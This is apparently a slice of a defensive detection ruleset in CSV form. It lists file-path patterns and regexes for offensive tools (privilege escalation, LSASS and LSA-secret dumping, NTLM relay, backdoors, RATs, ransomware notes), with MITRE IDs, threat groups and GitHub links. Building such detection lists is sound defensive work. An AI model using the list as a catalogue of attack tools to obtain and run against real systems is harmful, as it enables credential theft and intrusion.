"*\Loader\Loader.csproj*",".{0,1000}\\Loader\\Loader\.csproj.{0,1000}","offensive_tool_keyword","NixImports","A .NET malware loader using API-Hashing to evade static analysis","T1055.012 - T1562.001 - T1140","TA0005 - TA0003 - TA0040","N/A","N/A","Defense Evasion","https://github.com/dr4k0nia/NixImports","1","0","N/A","N/A","N/A","3","207","23","2023-05-30T14:14:21Z","2023-05-22T18:32:01Z","16315"
"*\Loader-EvtExportLog.cpp*",".{0,1000}\\Loader\-EvtExportLog\.cpp.{0,1000}","offensive_tool_keyword","Eventlogedit-evtx--Evolution","","T1070.001 - T1564.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/3gstudent/Eventlogedit-evtx--Evolution","1","0","N/A","N/A","9","3","267","62","2021-04-17T01:28:00Z","2018-06-05T01:21:20Z","16316"
"*\Loader-EvtExportLog.exe*",".{0,1000}\\Loader\-EvtExportLog\.exe.{0,1000}","offensive_tool_keyword","Eventlogedit-evtx--Evolution","","T1070.001 - T1564.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/3gstudent/Eventlogedit-evtx--Evolution","1","0","N/A","N/A","9","3","267","62","2021-04-17T01:28:00Z","2018-06-05T01:21:20Z","16317"
"*\LoaderMemoryModule_x64_Release.exe*",".{0,1000}\\LoaderMemoryModule_x64_Release\.exe.{0,1000}","offensive_tool_keyword","Tsunami","another C2 framework","T1573 - T1027 - T1059 - T1071 ","TA0011 - TA0009 - TA0003 - TA0007 - TA0008","N/A","N/A","C2","https://github.com/trustedsec/The_Shelf","1","0","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","16318"
"*\LoadLibrary_x64_Release.exe*",".{0,1000}\\LoadLibrary_x64_Release\.exe.{0,1000}","offensive_tool_keyword","Tsunami","another C2 framework","T1573 - T1027 - T1059 - T1071 ","TA0011 - TA0009 - TA0003 - TA0007 - TA0008","N/A","N/A","C2","https://github.com/trustedsec/The_Shelf","1","0","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","16319"
"*\Local\Temp\logins.log*",".{0,1000}\\Local\\Temp\\logins\.log.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","16321"
"*\local_admins.csv*",".{0,1000}\\local_admins\.csv.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","Dispossessor - MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork - FIN13 - WIZARD SPIDER - INDRIK SPIDER - PowerPool - APT32 - QUILTED TIGER - COZY BEAR - Turla","Framework","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","16323"
"*\local_execution_linux.exe*",".{0,1000}\\local_execution_linux\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002  - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","16324"
"*\local_map.exe*",".{0,1000}\\local_map\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002  - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","16325"
"*\local_thread_hijacking.exe*",".{0,1000}\\local_thread_hijacking\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002  - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","16326"
"*\LocalAdminAccess.txt*",".{0,1000}\\LocalAdminAccess\.txt.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","16327"
"*\LocalAdminSharp.sln*",".{0,1000}\\LocalAdminSharp\.sln.{0,1000}","offensive_tool_keyword","LocalAdminSharp",".NET executable to use when dealing with privilege escalation on Windows to gain local administrator access","T1055.011 - T1068 - T1548.002 - T1548.003 - T1548.004","TA0004","N/A","N/A","Privilege Escalation","https://github.com/notdodo/LocalAdminSharp","1","0","N/A","N/A","10","2","157","17","2022-11-01T17:45:43Z","2022-01-01T10:35:09Z","16328"
"*\localbrute.ps1*",".{0,1000}\\localbrute\.ps1.{0,1000}","offensive_tool_keyword","Minimalistic-offensive","A repository of tools for pentesting of restricted and isolated environments.","T1110 - T1046 - T1021 - T1203 - T1485","TA0006 - TA0007 - TA0008","N/A","Dispossessor","Credential Access","https://github.com/InfosecMatter/Minimalistic-offensive-security-tools","1","0","N/A","N/A","7","6","562","121","2021-10-26T11:04:46Z","2020-05-10T17:40:31Z","16329"
"*\localbrute.ps1*",".{0,1000}\\localbrute\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","16330"
"*\localbrute-extra-mini.ps1*",".{0,1000}\\localbrute\-extra\-mini\.ps1.{0,1000}","offensive_tool_keyword","Minimalistic-offensive","A repository of tools for pentesting of restricted and isolated environments.","T1110 - T1046 - T1021 - T1203 - T1485","TA0006 - TA0007 - TA0008","N/A","Dispossessor","Credential Access","https://github.com/InfosecMatter/Minimalistic-offensive-security-tools","1","0","N/A","N/A","7","6","562","121","2021-10-26T11:04:46Z","2020-05-10T17:40:31Z","16331"
"*\LocalPotato\*.cpp*",".{0,1000}\\LocalPotato\\.{0,1000}\.cpp.{0,1000}","offensive_tool_keyword","localpotato","The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. This attack allows for arbitrary file read/write and elevation of privilege.","T1550.002 - T1078.003 - T1005 - T1070.004","TA0004 - TA0006 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/LocalPotato","1","0","N/A","N/A","10","7","691","92","2023-11-07T01:09:08Z","2023-01-04T18:22:29Z","16332"
"*\LocalPotato\*.exe*",".{0,1000}\\LocalPotato\\.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","localpotato","The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. This attack allows for arbitrary file read/write and elevation of privilege.","T1550.002 - T1078.003 - T1005 - T1070.004","TA0004 - TA0006 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/LocalPotato","1","0","N/A","N/A","10","7","691","92","2023-11-07T01:09:08Z","2023-01-04T18:22:29Z","16333"
"*\LocalPrivEsc\*",".{0,1000}\\LocalPrivEsc\\.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","16334"
"*\LocalShellExtParse.py*",".{0,1000}\\LocalShellExtParse\.py.{0,1000}","offensive_tool_keyword","LocalShellExtParse","Script to parse first load time for Shell Extensions loaded by user. Also enumerates all loaded Shell Extensions that are only installed for the Current User.","T1547.009 - T1129","TA0003 - TA0007","N/A","N/A","Discovery","https://github.com/herrcore/LocalShellExtParse","1","0","N/A","N/A","9","1","20","4","2015-06-08T16:55:38Z","2015-06-05T03:23:13Z","16335"
"*\LocalShellExtParse-master*",".{0,1000}\\LocalShellExtParse\-master.{0,1000}","offensive_tool_keyword","LocalShellExtParse","Script to parse first load time for Shell Extensions loaded by user. Also enumerates all loaded Shell Extensions that are only installed for the Current User.","T1547.009 - T1129","TA0003 - TA0007","N/A","N/A","Discovery","https://github.com/herrcore/LocalShellExtParse","1","0","N/A","N/A","9","1","20","4","2015-06-08T16:55:38Z","2015-06-05T03:23:13Z","16336"
"*\localtonet.dll*",".{0,1000}\\localtonet\.dll.{0,1000}","offensive_tool_keyword","localtonet","LocaltoNet is a reverse proxy that enables you to expose your localhost services to the internet","T1090 - T1102 - T1071 - T1105","TA0010 - TA0011 - TA0009 - TA0003 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/engineseller/localtonet","1","0","N/A","N/A","10","1","6","4","2022-01-31T03:19:25Z","2022-01-31T03:17:18Z","16337"
"*\localtonet.exe*",".{0,1000}\\localtonet\.exe.{0,1000}","offensive_tool_keyword","localtonet","LocaltoNet is a reverse proxy that enables you to expose your localhost services to the internet","T1090 - T1102 - T1071 - T1105","TA0010 - TA0011 - TA0009 - TA0003 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/engineseller/localtonet","1","0","N/A","N/A","10","1","6","4","2022-01-31T03:19:25Z","2022-01-31T03:17:18Z","16338"
"*\localtonet-win*",".{0,1000}\\localtonet\-win.{0,1000}","offensive_tool_keyword","localtonet","LocaltoNet is a reverse proxy that enables you to expose your localhost services to the internet","T1090 - T1102 - T1071 - T1105","TA0010 - TA0011 - TA0009 - TA0003 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/engineseller/localtonet","1","0","N/A","N/A","10","1","6","4","2022-01-31T03:19:25Z","2022-01-31T03:17:18Z","16339"
"*\Lock.exe disk*",".{0,1000}\\Lock\.exe\sdisk.{0,1000}","offensive_tool_keyword","TrickDump","Dump lsass using only NTAPIS running 3 programs to create 3 JSON and 1 ZIP file and generate the Minidump later!","T1003.001 - T1027.002 - T1106 - T1212","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/ricardojoserf/TrickDump","1","0","N/A","N/A","10","5","444","50","2025-02-06T20:49:56Z","2024-06-24T12:24:59Z","16340"
"*\lockbit2.txt*",".{0,1000}\\lockbit2\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","16341"
"*\lockbit3.txt*",".{0,1000}\\lockbit3\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","16342"
"*\LockLess.csproj*",".{0,1000}\\LockLess\.csproj.{0,1000}","offensive_tool_keyword","Lockless","Lockless allows for the copying of locked files.","T1074 - T1020 - T1055","TA0009 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/GhostPack/Lockless","1","0","N/A","N/A","8","3","245","57","2021-04-30T17:51:41Z","2020-03-28T20:57:25Z","16343"
"*\LockLess.exe*",".{0,1000}\\LockLess\.exe.{0,1000}","offensive_tool_keyword","Lockless","Lockless allows for the copying of locked files.","T1074 - T1020 - T1055","TA0009 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/GhostPack/Lockless","1","0","N/A","N/A","8","3","245","57","2021-04-30T17:51:41Z","2020-03-28T20:57:25Z","16344"
"*\LockLess.exe*",".{0,1000}\\LockLess\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","16345"
"*\LockLess.exe*",".{0,1000}\\LockLess\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","16346"
"*\LockLess.sln*",".{0,1000}\\LockLess\.sln.{0,1000}","offensive_tool_keyword","Lockless","Lockless allows for the copying of locked files.","T1074 - T1020 - T1055","TA0009 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/GhostPack/Lockless","1","0","N/A","N/A","8","3","245","57","2021-04-30T17:51:41Z","2020-03-28T20:57:25Z","16347"
"*\loginAAD.ps1*",".{0,1000}\\loginAAD\.ps1.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","0","N/A","N/A","10","10","1132","128","2025-04-10T13:48:00Z","2022-06-28T00:00:28Z","16351"
"*\logon_backdoor\*",".{0,1000}\\logon_backdoor\\.{0,1000}","offensive_tool_keyword","logon_backdoor","automated sticky keys backdoor","T1174 - T1078 - T1546.013","TA0003","N/A","N/A","Persistence","https://github.com/szymon1118/logon_backdoor","1","0","N/A","N/A","6","1","10","4","2016-02-12T11:42:59Z","2016-02-10T22:38:46Z","16362"
"*\logon_backdoor-master*",".{0,1000}\\logon_backdoor\-master.{0,1000}","offensive_tool_keyword","logon_backdoor","automated sticky keys backdoor","T1174 - T1078 - T1546.013","TA0003","N/A","N/A","Persistence","https://github.com/szymon1118/logon_backdoor","1","0","N/A","N/A","6","1","10","4","2016-02-12T11:42:59Z","2016-02-10T22:38:46Z","16363"
"*\LogonScreen.exe*",".{0,1000}\\LogonScreen\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Erebus CobaltStrike post penetration testing plugin","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/DeEpinGh0st/Erebus","1","0","N/A","N/A","10","10","1518","221","2021-10-28T06:20:51Z","2019-09-26T09:32:00Z","16364"
"*\logonuifox.dll*",".{0,1000}\\logonuifox\.dll.{0,1000}","offensive_tool_keyword","ThievingFox","collection of post-exploitation tools to gather credentials from various password managers","T1555 - T1003 - T1056 - T1070","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Slowerzs/ThievingFox","1","0","N/A","N/A","10","6","535","65","2024-03-28T19:58:03Z","2024-01-20T23:22:52Z","16365"
"*\LokiRAT_Relapse.exe*",".{0,1000}\\LokiRAT_Relapse\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","16372"
"*\lolbin.exe*",".{0,1000}\\lolbin\.exe.{0,1000}","offensive_tool_keyword","LOLSpoof","An interactive shell to spoof some LOLBins command line","T1036.005","TA0005","N/A","N/A","Defense Evasion","https://github.com/itaymigdal/LOLSpoof","1","0","N/A","N/A","8","2","184","24","2024-01-27T05:43:59Z","2024-01-16T20:15:38Z","16373"
"*\lolMiner.cfg*",".{0,1000}\\lolMiner\.cfg.{0,1000}","offensive_tool_keyword","lolminer","NVIDIA+AMD GPU Miner","T1496","TA0040","N/A","N/A","Cryptomining","https://github.com/Lolliedieb/lolMiner-releases","1","0","N/A","N/A","9","10","2781","601","2025-02-01T20:03:57Z","2018-10-27T20:35:03Z","16374"
"*\lolminer.exe*",".{0,1000}\\lolminer\.exe.{0,1000}","offensive_tool_keyword","lolminer","NVIDIA+AMD GPU Miner","T1496","TA0040","N/A","N/A","Cryptomining","https://github.com/Lolliedieb/lolMiner-releases","1","0","N/A","N/A","9","10","2781","601","2025-02-01T20:03:57Z","2018-10-27T20:35:03Z","16375"
"*\lolMinerGUI.cpp*",".{0,1000}\\lolMinerGUI\.cpp.{0,1000}","offensive_tool_keyword","lolminer","NVIDIA+AMD GPU Miner","T1496","TA0040","N/A","N/A","Cryptomining","https://github.com/Lolliedieb/lolMiner-releases","1","0","N/A","N/A","9","10","2781","601","2025-02-01T20:03:57Z","2018-10-27T20:35:03Z","16376"
"*\lolMinerGUI.pdb*",".{0,1000}\\lolMinerGUI\.pdb.{0,1000}","offensive_tool_keyword","lolminer","NVIDIA+AMD GPU Miner","T1496","TA0040","N/A","N/A","Cryptomining","https://github.com/Lolliedieb/lolMiner-releases","1","0","N/A","N/A","9","10","2781","601","2025-02-01T20:03:57Z","2018-10-27T20:35:03Z","16377"
"*\LOLSpoof.nim*",".{0,1000}\\LOLSpoof\.nim.{0,1000}","offensive_tool_keyword","LOLSpoof","An interactive shell to spoof some LOLBins command line","T1036.005","TA0005","N/A","N/A","Defense Evasion","https://github.com/itaymigdal/LOLSpoof","1","0","N/A","N/A","8","2","184","24","2024-01-27T05:43:59Z","2024-01-16T20:15:38Z","16378"
"*\LOLSpoof\*",".{0,1000}\\LOLSpoof\\.{0,1000}","offensive_tool_keyword","LOLSpoof","An interactive shell to spoof some LOLBins command line","T1036.005","TA0005","N/A","N/A","Defense Evasion","https://github.com/itaymigdal/LOLSpoof","1","0","N/A","N/A","8","2","184","24","2024-01-27T05:43:59Z","2024-01-16T20:15:38Z","16379"
"*\Look at this instruction.txt*",".{0,1000}\\Look\sat\sthis\sinstruction\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","16380"
"*\lookupsid.py*",".{0,1000}\\lookupsid\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","16381"
"*\lookup-sid.py*",".{0,1000}\\lookup\-sid\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","16382"
"*\looneypwner.sh*",".{0,1000}\\looneypwner\.sh.{0,1000}","offensive_tool_keyword","POC","Exploit tool for CVE-2023-4911 targeting the 'Looney Tunables' glibc vulnerability in various Linux distributions.","T1068 - T1210 - T1555","TA0001 - TA0003 - TA0005","N/A","N/A","Exploitation tool","https://github.com/chaudharyarjun/LooneyPwner","1","0","#linux","N/A","10","1","38","12","2023-10-18T04:59:50Z","2023-10-17T07:44:16Z","16383"
"*\LostMyPassword.cfg*",".{0,1000}\\LostMyPassword\.cfg.{0,1000}","offensive_tool_keyword","LostMyPassword","Nirsoft tool that allows you to recover a lost password if it's stored by a software installed on your system","T1040 - T1003 - T1078 - T1518 - T1555","TA0006 - TA0009 ","N/A","LockBit","Credential Access","https://www.nirsoft.net/alpha/lostmypassword-x64.zip","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","16384"
"*\LostMyPassword_lng.ini",".{0,1000}\\LostMyPassword_lng\.ini","offensive_tool_keyword","LostMyPassword","Nirsoft tool that allows you to recover a lost password if it's stored by a software installed on your system","T1040 - T1003 - T1078 - T1518 - T1555","TA0006 - TA0009 ","N/A","LockBit","Credential Access","https://www.nirsoft.net/alpha/lostmypassword-x64.zip","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","16385"
"*\LostMyPassword32bit*",".{0,1000}\\LostMyPassword32bit.{0,1000}","offensive_tool_keyword","LostMyPassword","Nirsoft tool that allows you to recover a lost password if it's stored by a software installed on your system","T1040 - T1003 - T1078 - T1518 - T1555","TA0006 - TA0009 ","N/A","LockBit","Credential Access","https://www.nirsoft.net/alpha/lostmypassword-x64.zip","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","16386"
"*\LPE_Reflect_Elevate.x64.dll*",".{0,1000}\\LPE_Reflect_Elevate\.x64\.dll.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","16387"
"*\lsadump.py*",".{0,1000}\\lsadump\.py.{0,1000}","offensive_tool_keyword","creddump7","extracts various forms of credentials from Windows systems","T1003 - T1081 - T1040 - T1110 - T1555","TA0006 - TA0009","N/A","Sandworm","Credential Access","https://github.com/CiscoCXSecurity/creddump7","1","0","N/A","N/A","10","4","394","106","2020-10-02T13:25:16Z","2014-06-24T13:18:38Z","16388"
"*\lsadump.py*",".{0,1000}\\lsadump\.py.{0,1000}","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011 - T1040","TA0011 - TA0006 - TA0007","N/A","Lazarus Group - APT28 - FANCY BEAR - EMBER BEAR","Sniffing & Spoofing","https://github.com/lgandx/Responder-Windows/","1","0","N/A","N/A","N/A","6","523","137","2024-07-30T11:10:05Z","2015-02-07T22:59:04Z","16389"
"*\lsarelayx.cpp*",".{0,1000}\\lsarelayx\.cpp.{0,1000}","offensive_tool_keyword","lsarelayx","lsarelayx is system wide NTLM relay tool designed to relay incoming NTLM based authentication to the host it is running on","T1557.001 - T1187 - T1558","TA0001 - TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/CCob/lsarelayx","1","0","N/A","N/A","10","6","562","69","2023-04-25T23:15:33Z","2021-11-12T18:55:01Z","16390"
"*\lsarelayx.csproj*",".{0,1000}\\lsarelayx\.csproj.{0,1000}","offensive_tool_keyword","lsarelayx","lsarelayx is system wide NTLM relay tool designed to relay incoming NTLM based authentication to the host it is running on","T1557.001 - T1187 - T1558","TA0001 - TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/CCob/lsarelayx","1","0","N/A","N/A","10","6","562","69","2023-04-25T23:15:33Z","2021-11-12T18:55:01Z","16391"
"*\lsarelayx.sln*",".{0,1000}\\lsarelayx\.sln.{0,1000}","offensive_tool_keyword","lsarelayx","lsarelayx is system wide NTLM relay tool designed to relay incoming NTLM based authentication to the host it is running on","T1557.001 - T1187 - T1558","TA0001 - TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/CCob/lsarelayx","1","0","N/A","N/A","10","6","562","69","2023-04-25T23:15:33Z","2021-11-12T18:55:01Z","16392"
"*\lsasecrets.py*",".{0,1000}\\lsasecrets\.py.{0,1000}","offensive_tool_keyword","creddump7","extracts various forms of credentials from Windows systems","T1003 - T1081 - T1040 - T1110 - T1555","TA0006 - TA0009","N/A","Sandworm","Credential Access","https://github.com/CiscoCXSecurity/creddump7","1","0","N/A","N/A","10","4","394","106","2020-10-02T13:25:16Z","2014-06-24T13:18:38Z","16393"
"*\LSASecrets.txt*",".{0,1000}\\LSASecrets\.txt.{0,1000}","offensive_tool_keyword","PWDumpX","PWDumpX tool allows a user with administrative privileges to retrieve the encrypted password hashes and LSA secrets from a Windows system. This tool can be used on the local system or on one or more remote systems.","T1003.001 - T1555.003 - T1077","TA0006 - TA0008","N/A","N/A","Credential Access","https://packetstormsecurity.com/files/download/52580/PWDumpX.zip","1","0","N/A","N/A","10","8","N/A","N/A","N/A","N/A","16394"
